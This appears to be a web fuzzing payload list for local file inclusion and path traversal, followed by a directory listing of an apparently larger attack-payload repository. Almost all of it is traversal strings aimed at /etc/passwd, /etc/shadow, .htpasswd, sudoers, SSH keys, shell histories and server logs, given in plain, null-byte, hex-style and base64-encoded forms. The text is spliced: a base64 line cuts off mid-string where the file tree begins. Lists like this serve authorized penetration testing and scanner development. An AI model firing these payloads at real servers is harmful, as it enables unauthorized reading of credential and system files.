/etc/logrotate.d/ftp
/etc/logrotate.d/httpd
/etc/logrotate.d/proftpd
/etc/logrotate.d/vsftpd.log
/etc/mail/access
/etc/mailman/mm_cfg.py
/etc/make.conf
/etc/master.passwd
/etc/motd
/etc/my.cnf
/etc/mysql/my.cnf
/etc/netconfig
/etc/nsswitch.conf
/etc/opt/ipf/ipf.conf
/etc/opt/ipf/ipnat.conf
/./././././././././././etc/passwd
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/passwd^^
/..\../..\../..\../..\../..\../..\../etc/passwd
/etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../etc/passwd
../../../../etc/passwd
../../../etc/passwd
../../etc/passwd
../etc/passwd
..\..\..\..\..\..\..\..\..\..\etc\passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
\..\..\..\..\..\..\..\..\..\..\etc\passwd
etc/passwd
/etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/passwd%00
../../../../../../../../../etc/passwd%00
../../../../../../../../etc/passwd%00
../../../../../../../etc/passwd%00
../../../../../../etc/passwd%00
../../../../../etc/passwd%00
../../../../etc/passwd%00
../../../etc/passwd%00
../../etc/passwd%00
../etc/passwd%00
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
/../../../../../../../../../../../etc/passwd%00.html
/../../../../../../../../../../../etc/passwd%00.jpg
../../../../../../etc/passwd&=%3C%3C%3C%3C
/etc/php4.4/fcgi/php.ini
/etc/php4/apache2/php.ini
/etc/php4/apache/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php5/cgi/php.ini
/etc/php/apache2/php.ini
/etc/php/apache/php.ini
/etc/php/cgi/php.ini
/etc/php.d/dom.ini
/etc/php.d/gd.ini
/etc/php.d/imap.ini
/etc/php.d/json.ini
/etc/php.d/ldap.ini
/etc/php.d/mbstring.ini
/etc/php.d/mysqli.ini
/etc/php.d/mysql.ini
/etc/php.d/odbc.ini
/etc/php.d/pdo.ini
/etc/php.d/pdo_mysql.ini
/etc/php.d/pdo_odbc.ini
/etc/php.d/pdo_pgsql.ini
/etc/php.d/pdo_sqlite.ini
/etc/php.d/pgsql.ini
/etc/php.d/xmlreader.ini
/etc/php.d/xmlwriter.ini
/etc/php.d/xsl.ini
/etc/php.d/zip.ini
/etc/php.ini
/etc/php/php4/php.ini
/etc/php/php.ini
/etc/postfix/mydomains
/etc/proftp.conf
/etc/proftpd/modules.conf
/etc/protpd/proftpd.conf
/etc/pure-ftpd.conf
/etc/pureftpd.passwd
/etc/pureftpd.pdb
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/pureftpd.pdb
/etc/release
/etc/resolv.conf
/etc/rpc
/etc/security/environ
/etc/security/failedlogin
/etc/security/group
/etc/security/lastlog
/etc/security/limits
/etc/security/passwd
/etc/security/user
/./././././././././././etc/shadow
/../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/shadow^^
/..\../..\../..\../..\../..\../..\../etc/shadow
/etc/shadow
../../../../../../../../../../../../etc/shadow
..\..\..\..\..\..\..\..\..\..\etc\shadow
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\shadow
../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../etc/shadow%00
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
etc/shadow%00
/etc/ssh/sshd_config
/etc/sudoers
/etc/syslog.conf
/etc/syslogd.conf
/etc/system
/etc/updatedb.conf
/etc/utmp
/etc/vfstab
/etc/vhcs2/proftpd/proftpd.conf
/etc/vsftpd.chroot_list
/etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/wtmp
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers
/.forward
/home2\bin\stable\apache\php.ini
/home/apache/conf/httpd.conf
/home/apache/httpd.conf
/home\bin\stable\apache\php.ini
/.htpasswd
.htpasswd
../.htpasswd
../install.php
install.php
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../localstart.asp%00
/log/miscDir/accesslog
/.logout
/logs/access_log
/logs/access.log
../../../../../logs/access.log
../../../../logs/access.log
../../../logs/access.log
../../logs/access.log
../logs/access.log
/logs/error_log
/logs/error.log
../../../../../logs/error.log
../../../../logs/error.log
../../../logs/error.log
../../logs/error.log
../logs/error.log
/logs/pure-ftpd.log
/master.passwd
member/.htpasswd
members/.htpasswd
/.netrc
/NetServer\bin\stable\apache\php.ini
/opt/apache2/conf/httpd.conf
/opt/apache/conf/httpd.conf
/opt/lampp/logs/access_log
/opt/lampp/logs/access.log
/opt/lampp/logs/error_log
/opt/lampp/logs/error.log
/opt/xampp/etc/php.ini
/opt/xampp/logs/access_log
/opt/xampp/logs/access.log
/opt/xampp/logs/error_log
/opt/xampp/logs/error.log
.pass
../.pass
pass.dat
passwd
/.passwd
.passwd
../.passwd
passwd.dat
/php4\php.ini
/php5\php.ini
/php\php.ini
/PHP\php.ini
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf.default
/proc/cpuinfo
/proc/interrupts
/proc/loadavg
/proc/meminfo
/proc/mounts
/proc/net/arp
/proc/net/dev
/proc/net/route
/proc/net/tcp
/proc/partitions
/proc/self/cmdline
/proc/self/envron
/proc/version
/.profile
/Program Files\Apache Group\Apache2\conf\httpd.conf
/Program Files\Apache Group\Apache\conf\httpd.conf
/Program Files\Apache Group\Apache\logs\access.log
/Program Files\Apache Group\Apache\logs\error.log
/Program Files\xampp\apache\conf\httpd.conf
/../../../../pswd
/.rhosts
/root/.bash_history
/root/.bash_logut
root/.htpasswd
/root/.ksh_history
/root/.Xauthority
/.sh_history
/.shosts
/.ssh/authorized_keys
user/.htpasswd
../users.db.php
users.db.php
users/.htpasswd
/usr/apache2/conf/httpd.conf
/usr/apache/conf/httpd.conf
/usr/etc/pure-ftpd.conf
/usr/lib/cron/log
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/lib/security/mkuser.default
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/httpd.conf
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/error_log
/usr/local/apache2/logs/error.log
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/php.ini
/usr/local/apache/httpd.conf
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access_ log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access. log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../usr/local/apache/logs/access_log
../../../../../usr/local/apache/logs/access.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
../../../../../usr/local/apache/logs/error_log
../../../../../usr/local/apache/logs/error.log
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/apps/apache/conf/httpd.conf
/usr/local/cpanel/logs
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache/vhosts.conf
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/httpd/conf/httpd.conf
/usr/local/lib/php.ini
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php4/lib/php.ini
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/usr/local/php5/lib/php.ini
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.php
/usr/local/php/lib/php.ini
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/thttpd_log
/usr/local/Zend/etc/php.ini
/usr/pkgsrc/net/pureftpd/
/usr/ports/contrib/pure-ftpd/
/usr/ports/ftp/pure-ftpd/
/usr/ports/net/pure-ftpd/
/usr/sbin/pure-config.pl
/usr/spool/lp/log
/usr/spool/mqueue/syslog
/var/adm
/var/adm/acct/sum/loginlog
/var/adm/aculog
/var/adm/aculogs
/var/adm/crash/unix
/var/adm/crash/vmcore
/var/adm/cron/log
/var/adm/dtmp
/var/adm/lastlog
/var/adm/lastlog/username
/var/adm/log/asppp.log
/var/adm/loginlog
/var/adm/log/xferlog
/var/adm/lp/lpd-errs
/var/adm/messages
/var/adm/pacct
/var/adm/qacct
/var/adm/ras/bootlog
/var/adm/ras/errlog
/var/adm/sulog
/var/adm/SYSLOG
/var/adm/utmp
/var/adm/utmpx
/var/adm/vold.log
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/X0msgs
/var/apache/log
/var/apache/logs
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/cpanel/cpanel.config
/var/cron/log
/var/lib/mlocate/mlocate.db
/var/lib/mysql/my.cnf
/var/local/www/conf/php.ini
/var/lock/samba
/var/log
/var/log/access_log
/var/log/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../var/log/access_log
/var/log/acct
/var/log/apache2/access_log
/var/log/apache2/access.log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache2/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache2/error.log
/var/log/apache/access_log
/var/log/apache/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache/access.log
../../../../../var/log/apache/access_log
../../../../../var/log/apache/access.log
/var/log/apache/error_log
/var/log/apache/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache/error.log
../../../../../var/log/apache/error_log
../../../../../var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/auth
/var/log/authlog
/var/log/auth.log
/var/log/boot.log
/var/log/cron.log
/var/log/dmesg
/var/log/error_log
/var/log/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
../../../../../var/log/error_log
/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/exim_paniclog
/var/log/exim/paniclog
/var/log/exim_rejectlog
/var/log/exim/rejectlog
/var/log/ftplog
/var/log/ftp-proxy
/var/log/ftp-proxy/ftp-proxy.log
/var/log/httpd/
/var/log/httpd/access_log
/var/log/httpd/access.log
../../../../../var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/httpd/error.log
../../../../../var/log/httpd/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/kern.log
/var/log/lastlog
/var/log/lighttpd
/var/log/maillog
/var/log/message
/var/log/messages
/var/log/mysqlderror.log
/var/log/mysqld.log
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/log/ncftpd.errs
/var/log/ncftpd/misclog.txt
/var/log/news
/var/log/news.all
/var/log/news/news
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
/var/log/poplog
/var/log/POPlog
/var/log/proftpd
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/proftpd/xferlog.legacy
/var/log/pureftpd.log
/var/log/pure-ftpd/pure-ftpd.log
/var/log/qmail
/var/log/qmail/
/var/log/samba
/var/log/samba-log.%m
/var/log/secure
/var/log/smtpd
/var/log/spooler
/var/log/syslog
/var/log/telnetd
/var/log/thttpd_log
/var/log/utmp
/var/log/vsftpd.log
/var/log/wtmp
/var/log/xferlog
/var/log/yum.log
/var/lp/logs/lpNet
/var/lp/logs/lpsched
/var/lp/logs/requests
/var/mysql.log
/var/run/httpd.pid
/var/run/mysqld/mysqld.pid
/var/run/utmp
/var/saf/_log
/var/saf/port/log
/var/spool/errors
/var/spool/locks
/var/spool/logs
/var/spool/tmp
/var/www/conf/httpd.conf
/var/www/html/.htaccess
/var/www/localhost/htdocs/.htaccess
/var/www/log/access_log
/var/www/log/error_log
/../../var/www/logs/access_log
/var/www/logs/access_log
/var/www/logs/access.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../var/www/logs/access.log
/var/www/logs/error_log
/var/www/logs/error.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../var/www/logs/error_log
../../../../../var/www/logs/error.log
/var/www/sitename/htdocs/
/var/www/vhosts/sitename/httpdocs/.htaccess
/var/www/web1/html/.htaccess
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
/Volumes/webBackup/opt/apache2/conf/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
/web/conf/php.ini
/WINDOWS\php.ini
../../windows/win.ini
/WINNT\php.ini
/..\..\..\..\..\..\winnt\win.ini
/www/logs/proftpd.system.log
/xampp\apache\bin\php.ini
/.Xauthority
..2fapache2flogs2ferror.log
..2fapache2flogs2faccess.log
..2f..2fapache2flogs2ferror.log
..2f..2fapache2flogs2faccess.log
..2f..2f..2fapache2flogs2ferror.log
..2f..2f..2fapache2flogs2faccess.log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces_log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces.log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror_log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess.log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess_ log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess. log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror.log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror_l og
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror.l og
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror.log
..2fetc2fpasswd
..2fetc2fpasswd%00
..2f..2fetc2fpasswd
..2f..2fetc2fpasswd%00
..2f..2f..2fetc2fpasswd
..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00
L2V0Yy9tYXN0ZXIucGFzc3dk
L21hc3Rlci5wYXNzd2Q=
ZXRjL3Bhc3N3ZA==
ZXRjL3NoYWRvdyUwMA==
L2V0Yy9wYXNzd2Q=
L2V0Yy9wYXNzd2QlMDA=
Li4vZXRjL3Bhc3N3ZA==
Li4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vL
gitextract_ea3otx92/
├── .gitignore
├── README.md
├── _copyright.txt
├── attack/
│ ├── README.md
│ ├── all-attacks/
│ │ ├── all-attacks-unix.txt
│ │ ├── all-attacks-win.txt
│ │ └── all-attacks-xplatform.txt
│ ├── authentication/
│ │ ├── README.md
│ │ └── php_magic_hashes.fuzz.txt
│ ├── business-logic/
│ │ ├── CommonDebugParamNames.txt
│ │ ├── CommonMethodNames.txt
│ │ └── DebugParams.Json.fuzz.txt
│ ├── control-chars/
│ │ ├── HexValsAllBytes.txt
│ │ ├── NullByteRepresentations.txt
│ │ ├── imessage.txt
│ │ ├── terminal-escape-codes.txt
│ │ └── true.txt
│ ├── disclosure-directory/
│ │ └── directory-indexing-generic.txt
│ ├── disclosure-localpaths/
│ │ └── unix/
│ │ └── common-unix-httpd-log-locations.txt
│ ├── disclosure-source/
│ │ ├── README.md
│ │ ├── source-disc-cmd-exec-traversal.txt
│ │ ├── source-disclosure-generic.txt
│ │ └── source-disclosure-microsoft.txt
│ ├── email/
│ │ ├── invalid-email-addresses.txt
│ │ └── valid-email-addresses.txt
│ ├── file-upload/
│ │ ├── README.md
│ │ ├── alt-extensions-asp.txt
│ │ ├── alt-extensions-coldfusion.txt
│ │ ├── alt-extensions-jsp.txt
│ │ ├── alt-extensions-perl.txt
│ │ ├── alt-extensions-php.txt
│ │ ├── file-ul-filter-bypass-commonly-writable-directories.txt
│ │ ├── file-ul-filter-bypass-microsoft-asp-filetype-bf.txt
│ │ ├── file-ul-filter-bypass-microsoft-asp.txt
│ │ ├── file-ul-filter-bypass-ms-php.txt
│ │ ├── file-ul-filter-bypass-x-platform-generic.txt
│ │ ├── file-ul-filter-bypass-x-platform-php.txt
│ │ ├── invalid-filenames-linux.txt
│ │ ├── invalid-filenames-microsoft.txt
│ │ ├── invalid-filesystem-chars-microsoft.txt
│ │ ├── invalid-filesystem-chars-osx.txt
│ │ └── malicious-images/
│ │ ├── README.md
│ │ ├── eicar.com.txt
│ │ └── xssproject.swf
│ ├── format-strings/
│ │ └── format-strings.txt
│ ├── html_js_fuzz/
│ │ ├── HTML5sec_Injections.txt
│ │ ├── html_attributes.txt
│ │ ├── html_tags.txt
│ │ ├── javascript_events.txt
│ │ ├── js_inject.txt
│ │ └── quotationmarks.txt
│ ├── http-protocol/
│ │ ├── README.md
│ │ ├── crlf-injection.txt
│ │ ├── docs.http-method-defs.html
│ │ ├── hpp.txt
│ │ ├── http-header-cache-poison.txt
│ │ ├── http-protocol-methods.txt
│ │ ├── http-request-header-field-names.txt
│ │ ├── http-response-header-field-names.txt
│ │ ├── known-uri-types.txt
│ │ └── user-agents.txt
│ ├── integer-overflow/
│ │ └── integer-overflows.txt
│ ├── ip/
│ │ └── localhost.txt
│ ├── json/
│ │ └── JSON_Fuzzing.txt
│ ├── ldap/
│ │ ├── README.md
│ │ └── ldap-injection.txt
│ ├── lfi/
│ │ ├── JHADDIX_LFI.txt
│ │ ├── README.md
│ │ ├── common-ms-httpd-log-locations.txt
│ │ └── common-unix-httpd-log-locations.txt
│ ├── mimetypes/
│ │ └── MimeTypes.txt
│ ├── no-sql-injection/
